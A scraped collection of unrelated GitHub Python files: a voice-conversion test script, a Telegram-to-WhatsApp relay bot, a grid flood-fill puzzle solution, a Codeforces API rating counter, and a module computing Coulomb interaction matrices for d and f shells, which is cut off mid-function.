                os.makedirs(dir_path, exist_ok=True)
                for utt_id in f_h5[f'test/{src_speaker}']:
                    src_speaker_spec = f_h5[f'test/{src_speaker}/{utt_id}/lin'][()]
                    # BUG FIX: src_speaker was previously omitted from this
                    # call, so tar_speaker shifted into the src_speaker slot
                    # and convert() raised TypeError (missing tar_speaker).
                    convert(trainer,
                            seg_len,
                            src_speaker_spec,
                            src_speaker,
                            tar_speaker,
                            utt_id=utt_id,
                            speaker2id=speaker2id,
                            result_dir=dir_path,
                            enc_only=enc_only)
def test_single(trainer, seg_len, speaker2id_path, result_dir, enc_only, s_speaker, t_speaker):
    """Convert one hard-coded demo utterance of *s_speaker* into
    *t_speaker*'s voice, save result.wav/result.txt under result_dir, and
    print the ASR word/character error rates against the source audio.

    NOTE(review): the source wav paths are hard-coded per speaker id below;
    any other s_speaker raises NotImplementedError by design.
    """
    with open(speaker2id_path, 'r') as f_json:
        speaker2id = json.load(f_json)
    if s_speaker == 'S015':
        filename = './data/english/train/unit/S015_0361841101.wav'
    elif s_speaker == 'S119':
        filename = './data/english/train/unit/S119_1561145062.wav'
    elif s_speaker == 'S130':
        filename = './data/english/test/S130_3516588097.wav'
    elif s_speaker == 'S089':
        filename = './data/english/test/S089_1810826781.wav'
    elif s_speaker == 'S378':
        filename = './data/surprise/test/S378_117437.wav'
    else:
        raise NotImplementedError('Please modify path manually!')
    _, spec = get_spectrograms(filename)
    # save=[] makes convert() return the raw audio and encodings instead of
    # writing files itself; they are written explicitly below.
    wav_data, encodings = convert(trainer,
                                  seg_len,
                                  src_speaker_spec=spec,
                                  src_speaker=s_speaker,
                                  tar_speaker=t_speaker,
                                  utt_id='',
                                  speaker2id=speaker2id,
                                  result_dir=result_dir,
                                  enc_only=enc_only,
                                  save=[])
    sf.write(os.path.join(result_dir, 'result.wav'), wav_data, hp.sr, 'PCM_16')
    write_encodings(os.path.join(result_dir, 'result.txt'), encodings)
    err_result = compare_asr(filename, os.path.join(result_dir, 'result.wav'))
    print('Testing on source speaker {} and target speaker {}, output shape: {}'.format(s_speaker, t_speaker, wav_data.shape))
    print('Comparing ASR result - WERR: {:.3f} CERR: {:.3f}'.format(err_result[0], err_result[1]))
def test_encode(trainer, seg_len, test_path, data_path, result_dir, flag='test'):
    """Encode every '<s_id>_<utt_id>.wav' under *test_path*, reading the
    matching spectrograms from *data_path* and dumping encodings to
    result_dir/<flag>/."""
    wav_files = sorted(glob.glob(os.path.join(test_path, '*.wav')))
    feeds = []
    for wav_file in wav_files:
        basename = wav_file.split('/')[-1]
        feeds.append({'s_id': basename.split('_')[0],
                      'utt_id': basename.split('_')[1].split('.')[0]})
    print('[Tester] - Number of files to encoded: ', len(feeds))
    dir_path = os.path.join(result_dir, f'{flag}/')
    os.makedirs(dir_path, exist_ok=True)
    with h5py.File(data_path, 'r') as f_h5:
        for feed in tqdm(feeds):
            spec = f_h5[f"test/{feed['s_id']}/{feed['utt_id']}/lin"][()]
            encode(spec, trainer, seg_len, s_speaker=feed['s_id'], utt_id=feed['utt_id'], result_dir=dir_path)
def target_classify(trainer, seg_len, synthesis_list, result_dir, flag='test'):
    """Run the speaker classifier over previously converted wavs and print
    the fraction of segments classified as the intended target speaker.

    NOTE(review): the argmax->speaker mapping below hard-codes two targets
    (0 -> 'V001', 1 -> 'V002'); extend it if more targets are added.
    """
    dir_path = os.path.join(result_dir, f'{flag}/')
    with open(synthesis_list, 'r') as f:
        file = f.readlines()
    acc = []
    for line in file:
        # get wav path
        line = line.split('\n')[0].split(' ')
        utt_id = line[0].split('/')[1].split('_')[1]
        tar_speaker = line[1]
        wav_path = os.path.join(dir_path, f'{tar_speaker}_{utt_id}.wav')
        # get spectrogram
        _, spec = get_spectrograms(wav_path)
        # padding spec
        if len(spec) < seg_len:
            padding = np.zeros((seg_len - spec.shape[0], spec.shape[1]))
            spec = np.concatenate((spec, padding), axis=0)
        # classification: one logit vector per seg_len-sized fragment
        logits = []
        for idx in range(0, len(spec), seg_len):
            if idx + (seg_len*2) > len(spec):
                spec_frag = spec[idx:-1]
            else:
                spec_frag = spec[idx:idx+seg_len]
            if len(spec_frag) >= seg_len:
                x = torch.from_numpy(np.expand_dims(spec_frag[:seg_len, :], axis=0)).type(torch.FloatTensor)
                logit = trainer.classify(x)
                logits.append(logit)
            elif idx == 0:
                raise RuntimeError('Please check if input is too short!')
        logits = np.concatenate(logits, axis=0)
        #logits = np.sum(logits, axis = 0)
        # Score each fragment independently (no per-utterance aggregation).
        for logit in logits:
            am = logit.argmax()
            if am == 0:
                clf_speaker = 'V001'
            elif am ==1:
                clf_speaker = 'V002'
            else:
                clf_speaker = 'None'
            if clf_speaker == tar_speaker:
                acc.append(1)
                #print('[info]: {} is classified to {}'.format(wav_path, clf_speaker))
            else:
                acc.append(0)
                #print('[Error]: {} is classified to {}'.format(wav_path, clf_speaker))
    print('Classification Acc: {:.3f}'.format(np.sum(acc)/float(len(acc))))
def encode_for_tacotron(target, trainer, seg_len, multi2idx_path, wav_path, result_path):
    """Encode all wavs of speaker `target` into discrete units and write a Tacotron meta file.

    A mapping from each unique encoding to a symbol is built and dumped as JSON
    to `multi2idx_path`; "<s_id>_<u_id>|<symbols...>" lines are written to
    `result_path` (with the literal 'target' in the path replaced by the id).
    """
    wavs = sorted(glob.glob(os.path.join(wav_path, '*.wav')))
    print('[Converter] - Number of wav files to encoded: ', len(wavs))
    names = []
    enc_outputs = []
    for path in tqdm(wavs):
        stem = path.split('/')[-1].split('.')[0]
        s_id = stem.split('_')[0]
        u_id = stem.split('_')[1]
        if s_id != target:
            continue
        y, sr = librosa.load(path)
        d = librosa.get_duration(y=y, sr=sr)
        if d > 25:
            continue # --> this filter out too long utts, 3523/3533 for V001 and V002 together in the english dataset
        _, spec = get_spectrograms(path)
        encodings = parse_encodings(encode(spec, trainer, seg_len, save=False))
        enc_outputs.append(encodings)
        names.append((s_id, u_id))
    # build encodings to character mapping
    idx = 0
    multi2idx = {}
    print('[Converter] - Building encoding to symbol mapping...')
    for encodings in tqdm(enc_outputs):
        for encoding in encodings:
            if str(encoding) not in multi2idx:
                multi2idx[str(encoding)] = symbols[idx]
                idx += 1
    print('[Converter] - Number of unique discret units: ', len(multi2idx))
    with open(multi2idx_path, 'w') as file:
        file.write(json.dumps(multi2idx))
    result_path = result_path.replace('target', target)
    print('[Converter] - Writing to meta file...')
    with open(result_path, 'w') as file:
        for i, encodings in enumerate(enc_outputs):
            # "<s_id>_<u_id>|" header, then one symbol per discrete unit
            file.write(str(names[i][0]) + '_' + str(names[i][1]) + '|')
            for encoding in encodings:
                file.write(multi2idx[str(encoding)])
            file.write('\n')
| andi611/ZeroSpeech-TTS-without-T | convert.py | convert.py | py | 14,769 | python | en | code | 109 | github-code | 36 | [
{
"api_name": "librosa.istft",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "hps.hps.hp.hop_length",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "hps.hps.hp",
"line_number": 30,
"usage_type": "name"
},
{
"api_name": "hps.hps.hp.win_le... |
3302452099 | import telebot
import requests
import re
import os
from twilio.rest import Client
import pyrebase
bot = telebot.TeleBot("Replace this with telegram bot father key", parse_mode=None)

# Firebase project credentials; fill these in before running the bot.
config = {
    "apiKey": "",
    "authDomain": "",
    "databaseURL": "",
    "storageBucket": ""
}

# Staging values collected command by command; /settophone persists them
# all to Firebase under the chat id.
x = 0  # Twilio account SID
y = 0  # Twilio auth token
z = 0  # WhatsApp "from" phone number
q = 0  # WhatsApp "to" phone number

firebase = pyrebase.initialize_app(config)
db = firebase.database()

# Commands that require an "@<value>" argument.
_ARG_COMMANDS = {"/setsid", "/settoken", "/setfromphone", "/settophone",
                 "/updatetophone", "/updatefromphone", "/send"}


@bot.message_handler(func=lambda m: True)
def echo_all(message):
    """Dispatch a "<command>@<argument>" Telegram message.

    Supported commands: /start, /setsid, /settoken, /setfromphone,
    /settophone (persists sid/token/phones to Firebase), /updatetophone,
    /updatefromphone, and /send (sends the argument over WhatsApp via Twilio).
    Any other message is ignored, as before.
    """
    global x, y, z, q
    b = message.text.split('@')
    print(b)
    chatt = message.chat.id
    if b[0] == "/start":
        bot.reply_to(message, "Welcome to tele2WA bot")
        return
    if b[0] not in _ARG_COMMANDS:
        # Unknown message: ignore silently (original `else: pass` behavior).
        return
    if len(b) < 2:
        # BUGFIX: a bare command such as "/setsid" used to crash the handler
        # with IndexError on b[1]; reply with usage instead.
        bot.reply_to(message, "Missing argument, use <command>@<value>")
        return
    if b[0] == "/setsid":
        x = b[1]
        print(x)
        bot.reply_to(message, "SID added")
    elif b[0] == "/settoken":
        y = b[1]
        print(y)
        bot.reply_to(message, "token added")
    elif b[0] == "/setfromphone":
        z = b[1]
        print(z)
        bot.reply_to(message, "fromphone added")
    elif b[0] == "/settophone":
        q = b[1]
        print(q)
        data = {
            "sid": x,
            "token": y,
            "fromphone": z,
            "tophone": q
        }
        db.child("users").child(chatt).set(data)
        bot.reply_to(message, "details added")
    elif b[0] == "/updatetophone":
        db.child("users").child(chatt).update({"tophone": b[1]})
        bot.reply_to(message, "tophone updated")
    elif b[0] == "/updatefromphone":
        db.child("users").child(chatt).update({"fromphone": b[1]})
        bot.reply_to(message, "fromphone updated")
    elif b[0] == "/send":
        test = db.child("users").child(chatt).get()
        sid = test.val()['sid']
        token = test.val()['token']
        from_phone = test.val()['fromphone']
        to_phone = test.val()['tophone']
        client = Client(sid, token)
        client.messages.create(body=b[1],
                               from_="whatsapp:" + str(from_phone),
                               to="whatsapp:" + str(to_phone))


bot.polling()
| harishsg99/Telegram-to-WA-bot | app.py | app.py | py | 2,041 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "telebot.TeleBot",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "pyrebase.initialize_app",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "twilio.rest.Client",
"line_number": 75,
"usage_type": "call"
}
] |
13780351709 | import sys
from collections import deque
def div_area(q):
    """BFS flood-fill from the cells in deque `q`, marking every reachable
    0-cell of the global `area` grid as -1 (outside air)."""
    while q:
        row, col = q.popleft()
        # Visit the four orthogonal neighbours inside the n x m grid.
        for nr, nc in ((row + 1, col), (row - 1, col), (row, col + 1), (row, col - 1)):
            if 0 <= nr < n and 0 <= nc < m and area[nr][nc] == 0:
                area[nr][nc] = -1
                q.append([nr, nc])
def next_hour():
    """Advance the simulation by one hour.

    A cheese cell melts when at least two of its four neighbours are outside
    air (-1).  Any enclosed air pocket (0) adjacent to a melted cell becomes
    connected to the outside and is flood-filled afterwards.
    """
    global cheese
    remaining = []
    exposed = deque()  # melted cells that touched an interior air pocket
    melted = []
    for i, j in cheese:
        outside = 0  # neighbours already marked as outside air
        inner = 0    # neighbours that are enclosed air pockets
        for x, y in ((i - 1, j), (i + 1, j), (i, j - 1), (i, j + 1)):
            if area[x][y] == -1:
                outside += 1
            elif area[x][y] == 0:
                inner += 1
        if outside >= 2:
            melted.append([i, j])
            if inner > 0:
                exposed.append([i, j])
        else:
            remaining.append([i, j])
    for i, j in melted:
        area[i][j] = -1
    # Interior air next to a melted cell is now reachable from the outside.
    div_area(exposed)
    cheese = remaining
# --- driver: read the grid, mark outside air, count hours until all melts ---
n, m = map(int, sys.stdin.readline().strip().split())
area = [list(map(int, sys.stdin.readline().strip().split())) for _ in range(n)]

# Collect every cheese cell (value 1) once up front.
cheese = [[i, j] for i in range(n) for j in range(m) if area[i][j] == 1]

# Cell (0, 0) is outside air; flood-fill all outside air from it.
area[0][0] = -1
div_area(deque([[0, 0]]))

hours = 0
while cheese:
    next_hour()
    hours += 1
print(hours)
{
"api_name": "collections.deque",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sys.stdin.readline",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "sys.stdin",
"line_number": 43,
"usage_type": "attribute"
},
{
"api_name": "sys.stdin.readlin... |
5544666629 | import urllib.request
import datetime
import json
# 返回一个月内的cf场数和上/掉分情况
def get_CF_ContestCount(name):
    """Return [contest_count, rating_delta] for handle `name` over the last month.

    Queries the Codeforces user.rating API and sums rating changes whose
    update time falls within the last 32 days (rating updates usually lag
    the contest by about a day, hence 32 rather than 31).
    Returns [-1, -1] on any failure (network error, unknown handle, ...).
    """
    apiUrl = "https://codeforces.com/api/user.rating?handle=" + name
    try:
        # NOTE(review): urlopen's timeout is in seconds, so 2000 is ~33 min —
        # this looks like it was meant to be milliseconds; confirm before lowering.
        # Context manager closes the response even if json parsing fails.
        with urllib.request.urlopen(apiUrl, timeout=2000) as page:
            contestsData = json.loads(page.read().decode('utf-8'))['result']
        lastTime = (datetime.timedelta(days=-32) +
                    datetime.datetime.now()).timestamp()
        count = 0
        delta = 0  # renamed from `sum`/`cnt` to avoid shadowing builtins
        for contest in contestsData:
            if contest['ratingUpdateTimeSeconds'] < lastTime:
                continue
            count += 1
            delta += contest['newRating'] - contest['oldRating']
        return [count, delta]
    except Exception as e:
        print(str(e))
        return [-1, -1]
if __name__ == "__main__":
    # Simple interactive loop for manual testing.
    while True:
        handle = input("请输入要爬的ID:")
        print(get_CF_ContestCount(handle))
| Linzecong/LPOJ | CrawlingServer/CodeForceContestCounter.py | CodeForceContestCounter.py | py | 1,067 | python | en | code | 216 | github-code | 36 | [
{
"api_name": "urllib.request.request.urlopen",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "urllib.request.request",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "urllib.request",
"line_number": 10,
"usage_type": "name"
},
{
"api_nam... |
37952156492 | from math import sqrt
from itertools import product
import numpy as np
from scipy.special import factorial as fact
from functools import lru_cache
# The interaction matrix in desired basis
# U^{spherical}_{m1 m2 m3 m4} = \sum_{k=0}^{2l} F_k angular_matrix_element(l, k, m1, m2, m3, m4)
# H = \frac{1}{2} \sum_{ijkl,\sigma \sigma'} U_{ijkl} a_{i \sigma}^\dagger a_{j \sigma'}^\dagger a_{l \sigma'} a_{k \sigma}.
@lru_cache(maxsize=8)
def U_matrix(l,
             radial_integrals=None,
             U_int=None,
             J_hund=None,
             basis='spherical',
             T=None):
    r"""
    Calculate the full four-index U matrix from either radial integrals or (U_int, J_hund).

    The convention for the U matrix is the one used to construct Hamiltonians:

    .. math:: H = \frac{1}{2} \sum_{ijkl,\sigma \sigma'} U_{ijkl} a_{i \sigma}^\dagger a_{j \sigma'}^\dagger a_{l \sigma'} a_{k \sigma}.

    Parameters
    ----------
    l : integer
        Angular momentum of shell being treated (l=2 for d shell, l=3 for f shell).
    radial_integrals : tuple, optional
        Slater integrals (F0, F2, F4, ...).  Must be provided if U_int and
        J_hund are not given; takes precedence when both are supplied.
        NOTE: because results are memoized with ``lru_cache``, every argument
        must be hashable — pass a tuple, not a list.
    U_int : scalar, optional
        Value of the screened Hubbard interaction.
    J_hund : scalar, optional
        Value of the Hund's coupling.
    basis : string, optional
        'spherical' (default), 'cubic', or 'other' (requires T).
    T : real/complex numpy array, optional
        Transformation matrix for basis change, defined such that new creation
        operators relate to the old ones as
        :math:`b_{i \sigma}^\dagger = \sum_j T_{ij} a^\dagger_{j \sigma}`.

    Returns
    -------
    U_matrix : float numpy array
        The four-index interaction matrix in the chosen basis.
    """
    # Check all necessary information is present and consistent.
    if radial_integrals is None and (U_int is None and J_hund is None):
        raise ValueError(
            "U_matrix: provide either the radial_integrals or U_int and J_hund."
        )
    if radial_integrals is None and (U_int is not None and J_hund is not None):
        radial_integrals = U_J_to_radial_integrals(l, U_int, J_hund)
    if radial_integrals is not None and (U_int is not None
                                         and J_hund is not None):
        if len(radial_integrals) - 1 != l:
            raise ValueError(
                "U_matrix: inconsistency in l and number of radial_integrals provided."
            )
        # np.asarray so the element-wise comparison below works for any
        # sequence type (a plain list would already have failed inside
        # lru_cache, hence the tuple requirement documented above).
        if (np.asarray(radial_integrals) -
                U_J_to_radial_integrals(l, U_int, J_hund)).any():
            print(
                "Warning: U_matrix: radial_integrals provided do not match U_int and J_hund. Using radial_integrals to calculate U_matrix."
            )
    # Full interaction matrix in the basis of spherical harmonics
    # Y_{-l}, ..., Y_{l}:
    # U^{spherical}_{m1 m2 m3 m4} = \sum_{k=0}^{2l} F_k angular_matrix_element(l, k, m1, m2, m3, m4)
    U_mat = np.zeros(
        (2 * l + 1, 2 * l + 1, 2 * l + 1, 2 * l + 1), dtype=float)
    m_range = list(range(-l, l + 1))
    for n, F in enumerate(radial_integrals):
        k = 2 * n  # only even multipoles k = 0, 2, ..., 2l contribute
        for m1, m2, m3, m4 in product(m_range, m_range, m_range, m_range):
            U_mat[m1 + l, m2 + l, m3 + l, m4 +
                  l] += F * angular_matrix_element(l, k, m1, m2, m3, m4)
    # Transform from the spherical basis if requested.
    if basis == "cubic":
        T = spherical_to_cubic(l, convention='wien2k')
    if basis == "other" and T is None:
        raise ValueError("U_matrix: provide T for other bases.")
    if T is not None:
        U_mat = transform_U_matrix(U_mat, T)
    return U_mat
# Convert full 4-index U matrix to 2-index density-density form
def reduce_4index_to_2index(U_4index):
    r"""
    Reduce the four-index U matrix to the two density-density matrices.

    Parameters
    ----------
    U_4index : float numpy array
        The four-index interaction matrix, shape (2l+1,)*4.

    Returns
    -------
    U : float numpy array
        Two-index matrix for parallel spins (direct minus exchange term).
    Uprime : float numpy array
        Two-index matrix for anti-parallel spins (direct term only).
    """
    size = U_4index.shape[0]  # 2l+1
    U = np.empty((size, size), dtype=float)       # same spin
    Uprime = np.empty((size, size), dtype=float)  # opposite spin
    for m in range(size):
        for mp in range(size):
            direct = U_4index[m, mp, m, mp].real
            exchange = U_4index[m, mp, mp, m].real
            U[m, mp] = direct - exchange
            Uprime[m, mp] = direct
    return U, Uprime
# Construct the 2-index matrices for the density-density form
@lru_cache(maxsize=8)
def U_matrix_kanamori(n_orb, U_int, J_hund):
    r"""
    Build the Kanamori density-density interaction matrices.

    Parameters
    ----------
    n_orb : integer
        Number of orbitals in the basis.
    U_int : scalar
        Value of the screened Hubbard interaction.
    J_hund : scalar
        Value of the Hund's coupling.

    Returns
    -------
    U : float numpy array
        Parallel-spin matrix: 0 on the diagonal, U - 3J elsewhere.
    Uprime : float numpy array
        Anti-parallel-spin matrix: U on the diagonal, U - 2J elsewhere.
    """
    U = np.zeros((n_orb, n_orb), dtype=float)
    Uprime = np.zeros((n_orb, n_orb), dtype=float)
    for m in range(n_orb):
        for mp in range(n_orb):
            if m == mp:
                Uprime[m, mp] = U_int
            else:
                U[m, mp] = U_int - 3.0 * J_hund
                Uprime[m, mp] = U_int - 2.0 * J_hund
    return U, Uprime
@lru_cache(maxsize=8)
def U_matrix_dudarev(n_orb, U_int, J_hund):
    r"""
    Build the Dudarev density-density interaction matrices.

    Parameters
    ----------
    n_orb : integer
        Number of orbitals in the basis.
    U_int : scalar
        Value of the screened Hubbard interaction.
    J_hund : scalar
        Value of the Hund's coupling.

    Returns
    -------
    U : float numpy array
        Parallel-spin matrix: 0 on the diagonal, U - J elsewhere.
    Uprime : float numpy array
        Anti-parallel-spin matrix: U everywhere.
    """
    U = np.zeros((n_orb, n_orb), dtype=float)
    Uprime = np.zeros((n_orb, n_orb), dtype=float)
    for m in range(n_orb):
        for mp in range(n_orb):
            if m == mp:
                Uprime[m, mp] = U_int
            else:
                U[m, mp] = U_int - 1.0 * J_hund
                Uprime[m, mp] = U_int
    return U, Uprime
# Get t2g or eg components
def t2g_submatrix(U, convention=''):
    r"""
    Extract the t2g block of a full d-manifold two- or four-index U matrix.

    Parameters
    ----------
    U : float numpy array
        Two- or four-index interaction matrix.
    convention : string, optional
        '': basis ordered as ("xy","yz","z^2","xz","x^2-y^2"),
        'wien2k': basis ordered as ("z^2","x^2-y^2","xy","yz","xz").

    Returns
    -------
    U_t2g : float numpy array
        The t2g component of the interaction matrix.
    """
    # Column positions of the t2g orbitals depend on the basis ordering.
    if convention == 'wien2k':
        cols = (2, 3, 4)
    elif convention == '':
        cols = (0, 1, 3)
    else:
        raise ValueError("Unknown convention: " + str(convention))
    return subarray(U, len(U.shape) * [cols])
def eg_submatrix(U, convention=''):
    r"""
    Extract the eg block of a full d-manifold two- or four-index U matrix.

    Parameters
    ----------
    U : float numpy array
        Two- or four-index interaction matrix.
    convention : string, optional
        '': basis ordered as ("xy","yz","z^2","xz","x^2-y^2"),
        'wien2k': basis ordered as ("z^2","x^2-y^2","xy","yz","xz").

    Returns
    -------
    U_eg : float numpy array
        The eg component of the interaction matrix.
    """
    # Column positions of the eg orbitals depend on the basis ordering.
    if convention == 'wien2k':
        cols = (0, 1)
    elif convention == '':
        cols = (2, 4)
    else:
        raise ValueError("Unknown convention: " + str(convention))
    return subarray(U, len(U.shape) * [cols])
# Transform the interaction matrix into another basis
def transform_U_matrix(U_mat, T):
    r"""
    Transform a four-index interaction matrix into another basis.

    The transformation matrix is defined such that new creation operators
    :math:`b^\dagger` relate to the old ones as
    :math:`b_{i \sigma}^\dagger = \sum_j T_{ij} a^\dagger_{j \sigma}`.

    Parameters
    ----------
    U_mat : float numpy array
        The four-index interaction matrix in the original basis.
    T : real/complex numpy array
        Transformation matrix for the basis change.

    Returns
    -------
    U_mat : float numpy array
        The four-index interaction matrix in the new basis.
    """
    Tc = np.conj(T)
    Tt = np.transpose(T)
    # U'_{iknp} = T*_{ij} T*_{kl} U_{jlmo} (T^t)_{mn} (T^t)_{op}
    return np.einsum("ij,kl,jlmo,mn,op", Tc, Tc, U_mat, Tt, Tt)
# Rotation matrices: complex harmonics to cubic harmonics
# Complex harmonics basis: ..., Y_{-2}, Y_{-1}, Y_{0}, Y_{1}, Y_{2}, ...
def spherical_to_cubic(l, convention=''):
    r"""
    Get the spherical-harmonics-to-cubic-harmonics transformation matrix.

    Parameters
    ----------
    l : integer
        Angular momentum of shell being treated (l=2 for d shell, l=3 for f shell).
    convention : string, optional
        '': basis ordered as ("xy","yz","z^2","xz","x^2-y^2"),
        'wien2k': basis ordered as ("z^2","x^2-y^2","xy","yz","xz")
        (wien2k is implemented for l=2 only).

    Returns
    -------
    T : complex numpy matrix
        Unitary transformation matrix for the basis change.
    """
    if convention not in ('wien2k', ''):
        raise ValueError("Unknown convention: " + str(convention))
    size = 2 * l + 1
    T = np.zeros((size, size), dtype=complex)
    if convention == 'wien2k' and l != 2:
        raise ValueError(
            "spherical_to_cubic: wien2k convention implemented only for l=2")
    if l == 0:
        # BUGFIX: the s shell previously fell through with an all-zero matrix;
        # the identity is the (trivial) correct transformation.
        T[0, 0] = 1.0
    elif l == 1:
        # cubic basis ("x", "y", "z")
        T[0, 0] = 1.0 / sqrt(2)
        T[0, 2] = -1.0 / sqrt(2)
        T[1, 0] = 1j / sqrt(2)
        T[1, 2] = 1j / sqrt(2)
        T[2, 1] = 1.0
    elif l == 2:
        if convention == 'wien2k':
            # cubic basis ("z^2", "x^2-y^2", "xy", "yz", "xz")
            T[0, 2] = 1.0
            T[1, 0] = 1.0 / sqrt(2)
            T[1, 4] = 1.0 / sqrt(2)
            T[2, 0] = -1.0 / sqrt(2)
            T[2, 4] = 1.0 / sqrt(2)
            T[3, 1] = 1.0 / sqrt(2)
            T[3, 3] = -1.0 / sqrt(2)
            T[4, 1] = 1.0 / sqrt(2)
            T[4, 3] = 1.0 / sqrt(2)
        else:
            # cubic basis ("xy", "yz", "z^2", "xz", "x^2-y^2")
            T[0, 0] = 1j / sqrt(2)
            T[0, 4] = -1j / sqrt(2)
            T[1, 1] = 1j / sqrt(2)
            T[1, 3] = 1j / sqrt(2)
            T[2, 2] = 1.0
            T[3, 1] = 1.0 / sqrt(2)
            T[3, 3] = -1.0 / sqrt(2)
            T[4, 0] = 1.0 / sqrt(2)
            T[4, 4] = 1.0 / sqrt(2)
    elif l == 3:
        # cubic basis ("x(x^2-3y^2)", "z(x^2-y^2)", "xz^2", "z^3",
        #              "yz^2", "xyz", "y(3x^2-y^2)")
        T[0, 0] = 1.0 / sqrt(2)
        T[0, 6] = -1.0 / sqrt(2)
        T[1, 1] = 1.0 / sqrt(2)
        T[1, 5] = 1.0 / sqrt(2)
        T[2, 2] = 1.0 / sqrt(2)
        T[2, 4] = -1.0 / sqrt(2)
        T[3, 3] = 1.0
        T[4, 2] = 1j / sqrt(2)
        T[4, 4] = 1j / sqrt(2)
        T[5, 1] = 1j / sqrt(2)
        T[5, 5] = -1j / sqrt(2)
        T[6, 0] = 1j / sqrt(2)
        T[6, 6] = 1j / sqrt(2)
    else:
        raise ValueError("spherical_to_cubic: implemented only for l=0,1,2,3")
    return np.matrix(T)
# Names of cubic harmonics
def cubic_names(l):
    r"""
    Get the names of the cubic harmonics.

    Parameters
    ----------
    l : integer or string
        Angular momentum of shell being treated.
        Also takes 's', 'p', 'd', 'f', 't2g' and 'eg' as arguments.

    Returns
    -------
    cubic_names : tuple of strings
        Names of the orbitals.
    """
    if l == 0 or l == 's':
        # BUGFIX: ("s") is just the string "s"; return a real one-element
        # tuple so the result is a tuple of strings for every l, as documented.
        return ("s",)
    elif l == 1 or l == 'p':
        return ("x", "y", "z")
    elif l == 2 or l == 'd':
        return ("xy", "yz", "z^2", "xz", "x^2-y^2")
    elif l == 't2g':
        return ("xy", "yz", "xz")
    elif l == 'eg':
        return ("z^2", "x^2-y^2")
    elif l == 3 or l == 'f':
        return ("x(x^2-3y^2)", "z(x^2-y^2)", "xz^2", "z^3", "yz^2", "xyz",
                "y(3x^2-y^2)")
    else:
        raise ValueError("cubic_names: implemented only for l=0,1,2,3")
# Convert U,J -> radial integrals F_k
def U_J_to_radial_integrals(l, U_int, J_hund):
    r"""
    Determine the Slater radial integrals F_k from U_int and J_hund.

    Parameters
    ----------
    l : integer
        Angular momentum of shell being treated (l=2 for d shell, l=3 for f shell).
    U_int : scalar
        Value of the screened Hubbard interaction.
    J_hund : scalar
        Value of the Hund's coupling.

    Returns
    -------
    radial_integrals : float numpy array
        Slater integrals [F0, F2, F4, ...].
    """
    F = np.zeros(l + 1, dtype=float)
    F[0] = U_int  # F0 is the screened Hubbard U for every shell
    if l == 1:
        F[1] = 5.0 * J_hund
    elif l == 2:
        # d shell: standard ratio F4/F2 = 0.63
        F[1] = J_hund * 14.0 / (1.0 + 0.63)
        F[2] = 0.630 * F[1]
    elif l == 3:
        # f shell: ratios F4/F2 = 451/675 and F6/F2 = 1001/2025
        F[1] = 6435.0 * J_hund / (
            286.0 + 195.0 * 451.0 / 675.0 + 250.0 * 1001.0 / 2025.0)
        F[2] = 451.0 * F[1] / 675.0
        F[3] = 1001.0 * F[1] / 2025.0
    else:
        raise ValueError(
            "U_J_to_radial_integrals: implemented only for l=1,2,3")
    return F
# Convert radial integrals F_k -> U,J
def radial_integrals_to_U_J(l, F):
    r"""
    Determine U_int and J_hund from the Slater radial integrals.

    Parameters
    ----------
    l : integer
        Angular momentum of shell being treated (l=2 for d shell, l=3 for f shell).
    F : list
        Slater integrals [F0, F2, F4, ...].

    Returns
    -------
    U_int : scalar
        Value of the screened Hubbard interaction (= F0).
    J_hund : scalar
        Value of the Hund's coupling.
    """
    # J is a shell-dependent linear combination of the higher Slater integrals.
    if l == 1:
        J_hund = F[1] / 5.0
    elif l == 2:
        J_hund = F[1] * (1.0 + 0.63) / 14.0
    elif l == 3:
        J_hund = F[1] * (
            286.0 + 195.0 * 451.0 / 675.0 + 250.0 * 1001.0 / 2025.0) / 6435.0
    else:
        raise ValueError(
            "radial_integrals_to_U_J: implemented only for l=1,2,3")
    return F[0], J_hund
# Angular matrix elements of particle-particle interaction
# (2l+1)^2 ((l 0) (k 0) (l 0))^2 \sum_{q=-k}^{k} (-1)^{m1+m2+q} ((l -m1) (k q) (l m3)) ((l -m2) (k -q) (l m4))
def angular_matrix_element(l, k, m1, m2, m3, m4):
    r"""
    Calculate the angular matrix element

    .. math::
        (2l+1)^2
        \begin{pmatrix} l & k & l \\ 0 & 0 & 0 \end{pmatrix}^2
        \sum_{q=-k}^k (-1)^{m_1+m_2+q}
        \begin{pmatrix} l & k & l \\ -m_1 & q & m_3 \end{pmatrix}
        \begin{pmatrix} l & k & l \\ -m_2 & -q & m_4 \end{pmatrix}.

    Parameters
    ----------
    l : integer
    k : integer
    m1 : integer
    m2 : integer
    m3 : integer
    m4 : integer

    Returns
    -------
    ang_mat_ele : scalar
        Angular matrix element.
    """
    total = 0.0
    for q in range(-k, k + 1):
        phase = -1.0 if (m1 + q + m2) % 2 else 1.0
        total += (phase *
                  three_j_symbol((l, -m1), (k, q), (l, m3)) *
                  three_j_symbol((l, -m2), (k, -q), (l, m4)))
    # Common prefactor: (2l+1)^2 (l k l; 0 0 0)^2.
    return total * (2 * l + 1)**2 * (three_j_symbol((l, 0), (k, 0), (l, 0))**2)
# Wigner 3-j symbols
# ((j1 m1) (j2 m2) (j3 m3))
def three_j_symbol(jm1, jm2, jm3):
    r"""
    Calculate the Wigner three-j symbol

    .. math::
        \begin{pmatrix}
            l_1 & l_2 & l_3\\
            m_1 & m_2 & m_3
        \end{pmatrix}.

    Parameters
    ----------
    jm1 : tuple of integers
        (j_1 m_1)
    jm2 : tuple of integers
        (j_2 m_2)
    jm3 : tuple of integers
        (j_3 m_3)

    Returns
    -------
    three_j_sym : scalar
        Three-j symbol; 0 when a selection rule is violated.
    """
    j1, m1 = jm1
    j2, m2 = jm2
    j3, m3 = jm3
    # Selection rules: m-sum must vanish, |m| <= j, and triangle inequality.
    if (m1 + m2 + m3 != 0 or m1 < -j1 or m1 > j1 or m2 < -j2 or m2 > j2
            or m3 < -j3 or m3 > j3 or j3 > j1 + j2 or j3 < abs(j1 - j2)):
        return .0
    three_j_sym = -1.0 if (j1 - j2 - m3) % 2 else 1.0
    three_j_sym *= sqrt(
        fact(j1 + j2 - j3) * fact(j1 - j2 + j3) * fact(-j1 + j2 + j3) /
        fact(j1 + j2 + j3 + 1))
